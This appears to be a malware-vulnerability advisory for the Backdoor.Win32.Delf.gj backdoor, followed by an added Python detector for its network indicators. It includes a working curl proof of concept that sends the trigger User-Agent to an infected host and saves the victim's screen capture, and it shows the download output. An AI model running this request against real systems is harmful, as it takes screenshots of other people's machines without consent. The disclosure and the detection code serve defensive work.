Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/8872c2ec49ff3382240762a029631684.txt
Contact: [email protected]
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.Delf.gj
Vulnerability: Information Disclosure
Description: The malware listens on TCP port 80. Third-party attackers who can reach an infected system can send it an HTTP request whose User-Agent header is set to "netscreen.jpg". The backdoor answers with a screen capture of the victim machine.
Family: Delf
Type: PE32
MD5: 8872c2ec49ff3382240762a029631684
Vuln ID: MVID-2022-0663
Disclosure: 12/01/2022
Exploit/PoC:
curl http://x.x.x.x -H "User-agent: netscreen.jpg" --output screendump.jpg
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  215k  100  215k    0     0   215k      0  0:00:01 --:--:--  0:00:01 1976k
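A defender-side detection for the behaviour described above, added here as an example and not part of the Malvuln advisory. It assumes a constructed proxy-style log format (time, client, server:port, method, path, quoted User-Agent, hex of the first response bytes) and flags both the exact "netscreen.jpg" indicator and the behavioural tell of a JPEG being served for a non-image path on port 80.

```python
import re

# Indicators from the advisory: the backdoor listens on TCP/80 and answers a
# request whose User-Agent is exactly "netscreen.jpg" with a screen capture.
TRIGGER_USER_AGENT = "netscreen.jpg"
JPEG_SOI = "ffd8ff"  # hex of the JPEG start-of-image marker

# Constructed proxy-style log (not from the advisory). Fields:
# time client server:port method path "user-agent" first-response-bytes-hex
SAMPLE_LOG = """\
2022-12-01T10:00:01Z 10.0.0.5 10.0.0.20:80 GET / "Mozilla/5.0" 3c68746d
2022-12-01T10:00:02Z 10.0.0.5 10.0.0.20:80 GET / "netscreen.jpg" ffd8ffe0
2022-12-01T10:00:03Z 10.0.0.7 10.0.0.20:80 GET / "curl/7.81.0" ffd8ffe0
2022-12-01T10:00:04Z 10.0.0.7 10.0.0.21:80 GET /logo.jpg "Mozilla/5.0" ffd8ffe0
2022-12-01T10:00:05Z 10.0.0.9 10.0.0.20:8080 GET / "netscreen.jpg" 3c68746d
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<server>[^:\s]+):(?P<port>\d+) '
    r'(?P<method>\S+) (?P<path>\S+) "(?P<ua>[^"]*)" (?P<resp>[0-9a-f]*)$'
)

def parse_line(line):
    """Return one log record as a dict, or None if the line is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec

def classify(rec):
    """Return the reasons a record is suspicious (empty list if benign)."""
    reasons = []
    if rec["ua"].lower() == TRIGGER_USER_AGENT:
        reasons.append("trigger-user-agent")  # exact indicator, any port
    # Behavioural tell: a JPEG returned for a non-image path on port 80 is
    # what a screen capture from the backdoor looks like, whatever the UA.
    if (rec["port"] == 80 and rec["resp"].startswith(JPEG_SOI)
            and not rec["path"].lower().endswith((".jpg", ".jpeg"))):
        reasons.append("jpeg-for-non-image-path")
    return reasons

def detect(log_text):
    """Scan a log; return (server, client, reasons) per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := classify(rec)):
            alerts.append((rec["server"], rec["client"], reasons))
    return alerts
```

Calling detect(SAMPLE_LOG) yields three alerts: the trigger request, a JPEG served to a plain curl client on port 80, and the trigger User-Agent seen on port 8080; the /logo.jpg fetch is left alone.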
Disclaimer: This advisory information is provided "as-is," without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.com (TM)